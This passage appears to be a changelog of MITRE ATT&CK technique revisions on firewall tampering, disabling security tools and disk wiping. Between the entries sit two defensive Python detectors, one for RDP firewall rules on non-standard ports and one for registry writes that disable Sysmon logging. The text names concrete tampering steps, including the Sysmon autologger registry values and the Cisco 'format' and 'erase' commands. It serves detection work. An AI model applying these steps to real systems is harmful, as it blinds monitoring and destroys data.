external_references | | {'source_name': 'auditpol.exe_STRONTIC', 'description': 'STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.', 'url': 'https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html'}
external_references | | {'source_name': 'evt_log_tampering', 'description': 'svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.', 'url': 'https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c'}
x_mitre_contributors | | Lucas Heiligenstein

[T1562.007] Impair Defenses: Disable or Modify Cloud Firewall

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

New Description

Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
dictionary_item_removed
STIX Field | Old value | New value
x_mitre_permissions_required | ['User'] |
values_changed
STIX Field | Old value | New value
modified | 2021-03-08 10:33:02.146000+00:00 | 2023-04-15 00:25:36.502000+00:00
description | Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. | Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022) Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
external_references | | {'source_name': 'Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022', 'description': 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.', 'url': 'https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/'}

[T1562.004] Impair Defenses: Disable or Modify System Firewall

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

New Description

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)

New Mitigations:

Details
dictionary_item_added (STIX field: new value)
x_mitre_attack_spec_version: 3.1.0
x_mitre_deprecated: False
values_changed (STIX field: old value → new value)
modified: 2020-03-29 22:18:11.166000+00:00 → 2023-02-28 22:34:38.316000+00:00
description (old): Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.
description (new): Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)
x_mitre_data_sources[1]: Firewall: Firewall Rule Modification → Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]: Windows Registry: Windows Registry Key Modification → Firewall: Firewall Rule Modification
x_mitre_version: 1.0 → 1.1
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'change_rdp_port_conti', 'description': 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved March 1, 2022.', 'url': 'https://twitter.com/TheDFIRReport/status/1498657772254240768'}
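The firewall-rule case the new T1562.004 text describes, an inbound allow rule for RDP on a non-standard port, can be checked against the host's own rule list. The following is an added example and not ATT&CK's code: it parses text in the layout printed by `netsh advfirewall firewall show rule name=all` (the sample below is constructed), and flags enabled inbound allow rules that are labelled as Remote Desktop but open a port other than 3389, plus any inbound allow rule that is missing from a baseline of expected rule names. The baseline set is an assumption to be replaced with the organisation's own.

```python
"""Added example: flag suspicious inbound Windows Firewall allow rules.

Parses the block layout of `netsh advfirewall firewall show rule name=all`.
The baseline and the sample output are constructed for this example.
"""

# Assumed baseline of rule names expected on this host (not from the page).
BASELINE_RULES = {
    "Remote Desktop - User Mode (TCP-In)",
    "Core Networking - DNS (UDP-Out)",
}
RDP_STANDARD_PORT = "3389"
RDP_MARKERS = ("remote desktop", "rdp")


def parse_netsh_rules(text):
    """Split netsh output into one dict per rule; blocks end at a blank line."""
    rules, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                rules.append(current)
                current = {}
            continue
        if set(line) == {"-"}:          # separator under "Rule Name:"
            continue
        key, sep, val = line.partition(":")
        if sep:
            current[key.strip()] = val.strip()
    if current:
        rules.append(current)
    return rules


def flag_rules(rules, baseline=BASELINE_RULES):
    """Return (rule name, reason) for inbound allow rules worth a look."""
    findings = []
    for r in rules:
        if (r.get("Enabled") != "Yes" or r.get("Direction") != "In"
                or r.get("Action") != "Allow"):
            continue
        name = r.get("Rule Name", "")
        label = f"{name} {r.get('Grouping', '')}".lower()
        port = r.get("LocalPort", "Any")
        if any(m in label for m in RDP_MARKERS) and port != RDP_STANDARD_PORT:
            findings.append((name, f"RDP-labelled inbound allow on non-standard port {port}"))
        elif name not in baseline:
            findings.append((name, f"inbound allow rule not in baseline ({r.get('Protocol')} port {port})"))
    return findings


# Constructed sample in the netsh layout: a stock RDP rule, an added RDP rule
# on 13389, an outbound rule, and an unrelated inbound rule on 4444.
SAMPLE_NETSH = """
Rule Name:                            Remote Desktop - User Mode (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private
Grouping:                             Remote Desktop
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            3389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Remote Desktop 2
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Profiles:                             Domain,Private,Public
Grouping:
LocalIP:                              Any
RemoteIP:                             Any
Protocol:                             TCP
LocalPort:                            13389
RemotePort:                           Any
Edge traversal:                       No
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Protocol:                             UDP
RemotePort:                           53
Action:                               Allow

Rule Name:                            Windows Update Helper
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            4444
RemotePort:                           Any
Action:                               Allow
"""

if __name__ == "__main__":
    for name, reason in flag_rules(parse_netsh_rules(SAMPLE_NETSH)):
        print(f"{name}: {reason}")
```

The label check only catches rules the adversary left recognisably named. For a renamed rule, correlate the flagged port with the RDP listener port stored under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber; this change adds Windows Registry Key Modification as a data source for the technique, which is where that correlation lives.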

[T1562.001] Impair Defenses: Disable or Modify Tools

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description:
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)

New Description:
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)

Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational` may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
Details
dictionary_item_added (STIX field: new value)
external_references: Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.
dictionary_item_removed (STIX field: removed value)
external_references: CAPEC-578
values_changed (STIX field: old value → new value)
modified: 2022-10-24 15:23:59.433000+00:00 → 2023-04-12 13:43:42.986000+00:00
description: changed (full old and new text shown under Old Description / New Description above)
external_references[2]['source_name']: chasing_avaddon_ransomware → disable_win_evt_logging
external_references[2]['description']: Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022. → Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.
external_references[2]['url']: https://www.mandiant.com/resources/chasing-avaddon-ransomware → https://ptylu.github.io/content/report/report.html?report=25
external_references[3]['source_name']: doppelpaymer_crowdstrike → chasing_avaddon_ransomware
external_references[3]['description']: Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022. → Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.
external_references[3]['url']: https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/ → https://www.mandiant.com/resources/chasing-avaddon-ransomware
external_references[4]['source_name']: avoslocker_ransomware → doppelpaymer_crowdstrike
external_references[4]['description']: Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022. → Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.
external_references[4]['url']: https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html → https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/
external_references[5]['source_name']: dharma_ransomware → avoslocker_ransomware
external_references[5]['description']: Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022. → Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.
external_references[5]['url']: https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/ → https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html
external_references[6]['source_name']: MDSec System Calls → dharma_ransomware
external_references[6]['description']: MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. → Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.
external_references[6]['url']: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ → https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/
external_references[7]['source_name']: SCADAfence_ransomware → MDSec System Calls
external_references[7]['description']: Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022. → MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.
external_references[7]['url']: https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf → https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
external_references[8]['source_name']: demystifying_ryuk → SCADAfence_ransomware
external_references[8]['description']: Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022. → Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.
external_references[8]['url']: https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947 → https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf
external_references[9]['source_name']: capec → demystifying_ryuk
external_references[9]['url']: https://capec.mitre.org/data/definitions/578.html → https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[1]: Driver: Driver Load → Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]: Windows Registry: Windows Registry Key Modification → Process: Process Termination
x_mitre_data_sources[3]: Service: Service Metadata → Sensor Health: Host Status
x_mitre_data_sources[4]: Command: Command Execution → Driver: Driver Load
x_mitre_data_sources[5]: Process: Process Termination → Service: Service Metadata
x_mitre_data_sources[6]: Sensor Health: Host Status → Command: Command Execution
x_mitre_version: 1.3 → 1.4
iterable_item_added (STIX field: new value)
x_mitre_contributors: Lucas Heiligenstein
iterable_item_removed (STIX field: removed value)
x_mitre_contributors: Lucas Heiligenstein
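The Sysmon tampering added to the T1562.001 text is visible in registry telemetry: a write that zeroes the `Start` or `Enable` value of the Sysmon autologger session stops the trace session that feeds the Sysmon event log. The following is an added example and not ATT&CK's or Sysmon's code. It assumes Sysmon Event ID 13 (RegistryEvent, value set) records already parsed into dicts carrying Sysmon's own EventID, Image, TargetObject and Details fields, and the sample events are constructed.

```python
"""Added example: classify registry writes that disable the Sysmon autologger.

Input is assumed to be Sysmon Event ID 13 records as dicts. Sysmon renders
DWORD values in the Details field as "DWORD (0x00000000)", which is what the
regex below reads. Sample events are constructed for this example.
"""
import re
from typing import Iterable, Optional

# Key named in the T1562.001 description. Sysmon registers its trace session
# here; Start=0 or Enable=0 stops the session and with it Sysmon logging.
SYSMON_AUTOLOGGER_KEY = (
    r"HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger"
    r"\EventLog-Microsoft-Windows-Sysmon-Operational"
)
WATCHED_VALUES = {"Start", "Enable"}
_DWORD_RE = re.compile(r"DWORD\s*\(0x([0-9A-Fa-f]{1,8})\)")


def _normalise(path: str) -> str:
    # Sysmon writes the HKLM short form; other collectors expand the hive name.
    return path.replace("HKEY_LOCAL_MACHINE\\", "HKLM\\")


def classify(event: dict) -> Optional[str]:
    """'high' when Start/Enable is set to 0, 'medium' for any other write to
    those values (e.g. the Sysmon installer re-enabling the session),
    None when the event is unrelated."""
    if event.get("EventID") != 13:
        return None
    key, _, value_name = _normalise(event.get("TargetObject", "")).rpartition("\\")
    if key.lower() != SYSMON_AUTOLOGGER_KEY.lower() or value_name not in WATCHED_VALUES:
        return None
    m = _DWORD_RE.search(event.get("Details", ""))
    if m and int(m.group(1), 16) == 0:
        return "high"
    return "medium"


def scan(events: Iterable[dict]):
    """Return (severity, writing image, value name) for each relevant event."""
    hits = []
    for ev in events:
        sev = classify(ev)
        if sev:
            hits.append((sev, ev.get("Image", "?"), ev["TargetObject"].rsplit("\\", 1)[-1]))
    return hits


# Constructed sample: installer write, unrelated Run-key write, reg.exe zeroing
# Start, PowerShell zeroing Enable via the long hive name, and a key-level
# event (ID 12) that is not a value set.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\Sysmon64.exe",
     "TargetObject": SYSMON_AUTOLOGGER_KEY + r"\Start", "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\u.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": SYSMON_AUTOLOGGER_KEY + r"\Start", "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger"
                     r"\EventLog-Microsoft-Windows-Sysmon-Operational\Enable",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 12, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": SYSMON_AUTOLOGGER_KEY, "Details": ""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Note the blind spot: once the session is stopped Sysmon itself no longer reports, so the event that records the disabling write may be the last one collected. Pair this with the Sensor Health: Host Status data source this change moves up the list, and alert on the Sysmon channel going quiet after a `high` hit.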

[T1561.002] Disk Wipe: Disk Structure Wipe

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

New Description:
Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.

On network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
Details
dictionary_item_added (STIX field: new value)
x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors: ['Austin Clark, @c2defense']
x_mitre_deprecated: False
dictionary_item_removed (STIX field: removed value)
x_mitre_permissions_required: ['User', 'Administrator', 'root', 'SYSTEM']
values_changed (STIX field: old value → new value)
modified: 2020-03-28 23:00:00.367000+00:00 → 2023-04-14 19:38:24.089000+00:00
description: changed (full old and new text shown under Old Description / New Description above)
external_references[1]['source_name']: Symantec Shamoon 2012 → format_cmd_cisco
external_references[1]['description']: Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019. → Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.
external_references[1]['url']: https://www.symantec.com/connect/blogs/shamoon-attacks → https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668
external_references[2]['source_name']: FireEye Shamoon Nov 2016 → Unit 42 Shamoon3 2018
external_references[2]['description']: FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017. → Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.
external_references[2]['url']: https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html → https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/
external_references[4]['source_name']: Kaspersky StoneDrill 2017 → FireEye Shamoon Nov 2016
external_references[4]['description']: Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019. → FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.
external_references[4]['url']: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf → https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html
external_references[5]['source_name']: Unit 42 Shamoon3 2018 → Kaspersky StoneDrill 2017
external_references[5]['description']: Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019. → Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.
external_references[5]['url']: https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/ → https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf
x_mitre_data_sources[2]: Command: Command Execution → Driver: Driver Load
x_mitre_data_sources[3]: Driver: Driver Load → Command: Command Execution
x_mitre_detection (old): Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the `\\.\` notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.
x_mitre_detection (new): Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the `\\.\` notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity. For network infrastructure devices, collect AAA logging to monitor for `format` commands being run to erase the file structure and prevent recovery of the device.
x_mitre_version: 1.0 → 1.1
iterable_item_added (STIX field: new value)
external_references: {'source_name': 'Symantec Shamoon 2012', 'description': 'Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.', 'url': 'https://www.symantec.com/connect/blogs/shamoon-attacks'}
x_mitre_platforms: Network

[T1561] Disk Wipe

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description:
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

New Description:
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)

On network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `erase`.(Citation: erase_cmd_cisco)
Details
dictionary_item_added (STIX field: new value)
x_mitre_contributors: ['Austin Clark, @c2defense']
values_changed (STIX field: old value → new value)
modified: 2022-07-28 18:55:35.987000+00:00 → 2023-04-20 18:16:41.942000+00:00
description: changed (full old and new text shown under Old Description / New Description above)
external_references[1]['source_name']: Novetta Blockbuster Destructive Malware → erase_cmd_cisco
